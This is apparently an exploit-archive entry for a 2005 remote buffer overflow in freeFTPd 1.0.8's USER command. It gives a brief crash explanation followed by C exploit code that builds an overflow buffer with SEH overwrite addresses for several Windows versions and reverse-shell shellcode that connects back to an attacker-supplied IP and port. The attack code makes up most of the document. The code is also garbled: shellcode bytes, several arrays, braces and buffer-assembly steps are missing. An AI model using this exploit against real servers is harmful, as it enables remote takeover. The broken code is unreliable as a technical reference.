freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow

Related Vulnerabilities: CVE-2005-3684   CVE-2005-3683  
Publish Date: 17 Nov 2005
Author: Expanders
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   26\09\05    \/      |__|      \/     \/

[i] Title:              FreeFTPD Remote USER Buffer overflow
[i] Discovered by:      barabas [mutsonline]
[i] Exploit by:         Expanders

[ Why FTPD crash? ]

When logging option is enabled freeftpd copy the user and the pass supplied by the user in the memory before put it in a logfile.

----Code Snippet----
78001D5D   MOV ECX,DWORD PTR SS:[ESP+4]  Ftpd put in ECX SP+4 that point to the user supplied data.

If attacker's username is too big for the size of the buffer first we go to overwrite SEH handler(1011 bytes) and then the stack itself.

Beacuse stack point to our buffer this code

----Code Snippet----

will cause an access violation.

Code Execution is possible.

[ Timeline ]

This vulnerability was not comunicated to the author.

[ Links ]


#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUGSTR "USER %s \r\nPASS x0ned\r\n" // Command where bug reside
#define BUFFSIZE 2000 // Buffer size

int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );

/* win32_reverse -  EXITFUNC=seh LHOST= LPORT=0 Size=312 Encoder=Pex */
char shellcode[] =

"\x00\x00\x00\x00" // IP


"\x00\x00" // PORT

char jmpback[]=
//22 byte xor decoder (0x55)
//(20 byte jump-back code -> springt 256 + 256 + 64 bytes terug)

char jmpover[]=
// 2 bytes jump 4 bytes over - 2 bytes NOP

struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "Windows NT SP 5/6"   , 0x776a1082 },   // ws2help.dll pop esi, pop ebx, retn  [Tnx to metasploit]
	{ "Windows 2k Universal", 0x750211a9 },   // ws2help.dll pop ebp, pop ebx, retn  [Tnx to metasploit]
	{ "Windows XP SP 1/2"   , 0x71aa13d6 },   // ws2help.dll pop ebx, pop ebp, retn  [Tnx to metasploit]
	{ NULL }
int banner() {
  printf("\n       _______         ________           .__        _____          __     \n");
  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
  printf("[i] Title:        \tFreeFTPD Remote USER Buffer overflow\n");
  printf("[i] Discovered by:\tbarabas [mutsonline]\n");
  printf("[i] Exploit by:   \tExpanders\n\n");
  return 0;

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <host> <port> <l_ip> <l_port> <targ>\n\n",filename);
  printf("       \t<host>   : Victim's host\n");
  printf("       \t<port>   : Victim's port  ::  Default: 21\n");
  printf("       \t<l_ip>   : Local ip address for connectback\n");
  printf("       \t<l_port> : Local port for connectback\n");
  printf("       \t<targ>   : Target from the list below\n\n");
  printf("#   \t Platform\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t %s\n",i,targets[i].platform);

int inject(char *port, char *ip)
    unsigned long xorip;
    unsigned short xorport;
    xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;
    xorport = htons(atoi( port ))^(unsigned short)0x2D4A;
    memcpy ( &shellcode[184], &xorip, 4);
    memcpy ( &shellcode[190], &xorport, 2);
    return 0;

int remote_connect( char* ip, unsigned short port )
  int s;
  struct sockaddr_in remote_addr;
  struct hostent* host_addr;

  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
   printf ( "[X] Cannot resolve \"%s\"\n", ip );
   exit ( 1 );
  remote_addr.sin_family = AF_INET;
  remote_addr.sin_port = htons ( port );
  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
   printf ( "[X] Socket failed!\n" );
   exit ( 1 );
  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
   printf ( "[X] Failed connecting!\n" );
   exit ( 1 );
  return ( s );

int main(int argc, char *argv[]) {
    int s,position;
    unsigned int rcv;
    char *buffer,*request;
    char recvbuf[256];
    if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
    position = 0;
    printf("[+] Creating evil buffer\n");
    buffer = (char *) malloc(BUFFSIZE);
    request = (char *) malloc(BUFFSIZE + strlen(BUGSTR)); //  +3 == \r + \n + 0x00
    memset(buffer,0x90,BUFFSIZE);  // Fill with nops

    inject(argv[4],argv[3]);     // Xor port and ip and put them into the shellcode

    position = 1007 - (strlen(shellcode) + 100);   // 1007 : Pointer to next Execption structure  100: divide spaces
    position += strlen(shellcode)+100;
    position += 2; // 2 bytes more nops
    position += 2;
    position += 4;
    position += 8; // 8 bytes more nops
    position += strlen(jmpback);
    position += 8; // 8 bytes more nops
    memset(buffer+position,0x00,1); // End

    printf("[+] Connecting to remote host\n");
    s = remote_connect(argv[1],atoi(argv[2]));
     printf("\n[X] Error while recieving banner!\n");
    if (strstr(recvbuf,"freeFTPd")!=0)
     printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
     if ( send ( s, request, strlen (request), 0) <= 0 )
            printf("[X] Failed to send buffer\n");
            exit ( 1 );
     printf("[+] Done - Wait for shell on port %s\n",argv[4]);
    } else
      printf("[X] This server is not running freeFTPd\n");
    buffer = NULL;
    return 0;

// [2005-11-17]